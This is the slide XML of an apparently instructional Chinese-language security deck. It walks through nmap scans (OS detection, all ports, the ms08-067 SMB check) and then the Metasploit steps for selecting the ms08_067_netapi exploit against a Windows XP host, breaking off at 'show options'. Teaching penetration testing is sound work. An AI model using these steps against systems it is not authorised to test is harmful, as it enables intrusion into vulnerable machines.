                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82671EA8-09E7-4904-ADCE-3DF12931EB05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309093" y="3734873"/>
            <a:ext cx="2975020" cy="2318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B7077E3E-A04A-425C-81D2-359530419EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718997" y="3734873"/>
            <a:ext cx="673150" cy="2318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內容版面配置區 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD47D6F8-6DDC-4B0F-A731-203CC08D2087}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="39660" t="39400" r="40909" b="48762"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850677" y="643827"/>
            <a:ext cx="3799402" cy="1738462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F205DC1-7BF8-4D3B-95F1-6A67F1AEE4B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7850677" y="643827"/>
            <a:ext cx="3817582" cy="17594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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{252B2FC0-600D-4F72-BB5D-113AECAE44FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7850677" y="2403287"/>
            <a:ext cx="868320" cy="133158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C8416B99-4467-404A-9CA4-F07C03A7AAE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9392147" y="2424285"/>
            <a:ext cx="2257932" cy="12895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427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內容版面配置區 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C342B369-EFAF-4D7B-BAB8-09F34C5129F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6308" b="14623"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065979" y="1878703"/>
            <a:ext cx="9544887" cy="4084215"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="標題 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C639AD-005C-4D8C-880A-6626D45CE3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t> -o ip</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文字方塊 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6B8BCB-2975-4EED-B7D3-9F3402A589FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4623514" y="1727505"/>
            <a:ext cx="3644721" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>掃描目標主機的作業系統</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED671774-214E-4EEC-B2D4-DD96DC404F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1081825" y="4146997"/>
            <a:ext cx="7443989" cy="6568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92439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66D0CA-570D-4CD3-AFB1-C7FCBCB5FD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>nmap –p 0-65535 IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6128B9E2-042F-479D-BC74-EFDFFE98520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5179" b="72105"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428151" y="1751851"/>
            <a:ext cx="9684467" cy="4262909"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52561A83-D28A-4286-B99B-94E4B5D783F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7171683" y="1884026"/>
            <a:ext cx="3940935" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>掃描目標主機的所有埠口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1789313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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>系統的資安威脅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906006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9F90CB-9766-4243-AA3A-C2A4221BDB12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>SMB on XP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{785965E3-E8FF-4062-B523-A9E75F5662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7954" y="1596980"/>
            <a:ext cx="6338827" cy="4760287"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1478302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32B753-6DDF-429D-A8BE-2682059ABDE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336175" y="365125"/>
            <a:ext cx="11416553" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>nmap –script smb-vuln-ms08-067.nse –p 445 IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7202C7D-294F-485B-B848-C95B67F544B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4687" b="47243"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2066419" y="2060139"/>
            <a:ext cx="8458027" cy="4432736"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C94343-4B1B-4CC1-971F-15C6C96781E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2086377" y="3876541"/>
            <a:ext cx="8319753" cy="21121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74BEC689-7CE6-475A-8AB8-51EC49E689CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1690688"/>
            <a:ext cx="4507606" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>發現</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ms08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1299200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8DEFCB-4F97-41C5-9846-B7A6A9FC772D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>nmap -script vuln IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C646F64-AAFC-4C1F-A58E-82A3225E954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24" r="44687" b="12319"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798306" y="1304645"/>
            <a:ext cx="6595387" cy="5759417"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282A8728-9B1C-45E1-A14E-C830DE5E7654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798306" y="2846231"/>
            <a:ext cx="6595387" cy="17386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1E153BC9-5011-47EB-9CC4-229F96D053DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2376281"/>
            <a:ext cx="4507606" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>發現</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ms08-067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4231738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1E6F39-8F25-43A5-9F4D-904089B142EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{790D6243-23E7-49D9-B9A8-851CB3E5197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70383" b="23565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4934683" y="138448"/>
            <a:ext cx="4640831" cy="6581104"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B89BA79-A613-4C13-93A4-652E1C9613E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2331076"/>
            <a:ext cx="3232597" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的環境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1359780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F270F9-572B-414F-80DE-5E6FEC31AAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>search ms08_067</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61437A45-4038-49FB-89DA-6EE346E8744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7006" r="26798" b="45764"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="517791" y="2686714"/>
            <a:ext cx="11674209" cy="2386150"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63098AEC-7C0D-49B2-95E0-C23B05CF8950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4893971" y="2011845"/>
            <a:ext cx="5241701" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>尋找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>ms08_067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的相關腳本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2805685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98086A-6C9B-4D78-B02C-3C60ECEB71B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>use exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{471E26ED-C708-41BC-8E7B-FC29E26DD77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2418" r="61439" b="83"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141281" y="2785056"/>
            <a:ext cx="10094132" cy="1078606"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81000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6BA930-C16E-4321-902D-692D723055B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>show options</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CCC445C-FE33-476E-850D-478685DD8FE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t="28997" r="35896" b="16758"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1445292" y="1921323"/>
            <a:ext cx="9301415" cy="4324930"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E455360C-C401-45FD-B167-D318216C118B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
